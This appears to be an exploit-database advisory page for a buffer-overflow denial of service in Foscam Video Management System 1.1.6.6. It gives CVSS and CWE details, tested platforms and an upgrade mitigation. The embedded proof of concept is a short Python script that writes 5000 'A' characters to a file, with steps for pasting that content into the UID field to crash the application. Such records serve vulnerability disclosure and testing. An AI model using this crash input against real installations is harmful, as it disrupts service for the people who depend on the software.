Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)

vendor:

Foscam Video Management System

by:

Alessandro Magnosi

7.5

CVSS

HIGH

Denial of Service (DoS) Local

119

CWE

Product Name: Foscam Video Management System

Affected Version From: 1.1.6.6

Affected Version To: 1.1.6.6

Patch Exists: YES

Related CWE: N/A

CPE: a:foscam:foscam_video_management_system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 SP1 x86 en, Windows 10 Pro x64 it

2019

Foscam Video Management System 1.1.6.6 – ‘UID’ Denial of Service (PoC)

A buffer overflow vulnerability exists in Foscam Video Management System 1.1.6.6, which could allow an attacker to cause a denial of service condition. An attacker must first run a python code to create a file containing a large amount of data. The attacker must then copy the content of the file into the UID field of the Add Device page in the FoscamVMS application. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of Foscam Video Management System.

Source

Exploit-DB raw data:

# Exploit Title: Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)
# Author: Alessandro Magnosi
# Date: 2019-10-09
# Vendor Homepage: https://www.foscam.com/
# Software Link : https://www.foscam.com/downloads/appsoftware.html?id=5
# Tested Version: 1.1.6.6
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 SP1 x86 en, Windows 10 Pro x64 it

# Steps to Produce the Crash: 
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.6.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"
# 6.- Copy the content of the file into UID
# 7.- Click on Login Check
# 8.- Crashed

#!/usr/bin/python
 
buffer = "A" * 5000
f = open ("FoscamVMS1.1.6.txt", "w")
f.write(buffer)
f.close()